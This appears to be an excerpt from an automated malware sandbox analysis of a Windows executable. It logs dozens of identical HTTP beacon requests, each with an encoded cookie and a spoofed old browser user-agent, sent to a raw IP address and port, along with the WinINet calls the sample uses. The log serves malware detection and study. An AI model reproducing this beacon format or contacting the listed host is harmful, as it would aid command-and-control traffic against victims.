                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: unknownTCP traffic detected without corresponding DNS query: 152.42.226.16
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB2C3F _memset,__snprintf,__snprintf,__snprintf,HttpOpenRequestA,HttpSendRequestA,InternetCloseHandle,InternetQueryDataAvailable,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00DB2C3F
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
